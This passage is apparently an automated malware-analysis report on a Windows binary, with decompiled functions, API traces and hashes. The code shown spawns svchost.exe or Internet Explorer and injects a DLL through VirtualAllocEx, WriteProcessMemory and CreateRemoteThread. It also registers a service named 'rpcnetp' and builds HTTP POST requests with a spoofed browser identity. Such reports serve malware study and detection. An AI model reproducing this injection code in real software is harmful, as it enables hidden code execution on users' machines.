					goto L14;
				}
				return _t30 | 0xffffffff;
			}

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
FreeLibrary.KERNEL32(?), ref: 001D2D3F
inet_ntoa.WSOCK32(?), ref: 001D2D5E
wsprintfA.USER32 ref: 001D2DBF

Strings

%s: 0, xrefs: 001D2DB9
N, xrefs: 001D2CD4
POST, xrefs: 001D2D87
Mozilla/4.0 (compatible; MSIE 6.0;), xrefs: 001D2D26
TagId, xrefs: 001D2DB1
wininet.dll, xrefs: 001D2CCF

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Similarity

Total matches: 6
API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
String ID:
API String ID: 3127335161-0
Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f

C-Code - Quality: 96%

			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}

APIs

GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1

Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8

DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8

Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

CloseHandle.KERNEL32(00000000), ref: 001D31A8

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
CloseHandle.KERNEL32(?), ref: 001D3236
CloseHandle.KERNEL32(?), ref: 001D3247
CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B

Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D

Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID: !$@
API String ID: 677720824-1106925043
Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00

C-Code - Quality: 88%

			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3

Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 004036CB

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID:
API String ID: 677720824-0
Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7

C-Code - Quality: 87%

			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Similarity

Total matches: 6
API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
String ID: d
API String ID: 2989656138-2564639436
Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1

C-Code - Quality: 100%

			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}

APIs

DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
KillTimer.USER32(?,00000064), ref: 001D23FE
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434

Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

SetEvent.KERNEL32(00000000), ref: 001D246C
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
KillTimer.USER32(?,00000064), ref: 001D2490
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
PostQuitMessage.USER32(00000000), ref: 001D24AF

Strings

d, xrefs: 001D23F5

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Similarity

Total matches: 6
API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
String ID: rpcnetp
API String ID: 1312310708-3180878357
Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82

C-Code - Quality: 75%

			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C

Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F

Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
CloseHandle.KERNEL32(00000000), ref: 001D35B9
CloseHandle.KERNEL32 ref: 001D35C5

Strings

rpcnetp, xrefs: 001D34F8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Similarity

Total matches: 6
API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
String ID: x
API String ID: 3363633688-2363233923
Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37

C-Code - Quality: 84%

			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

ExitThread.KERNEL32 ref: 001D2281

Strings

x, xrefs: 001D21BE

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Similarity

Total matches: 6
API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
String ID: [FILE]$SystemRoot$[FILE]
API String ID: 4133047914-1656360392
Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653

C-Code - Quality: 100%

			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}

0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
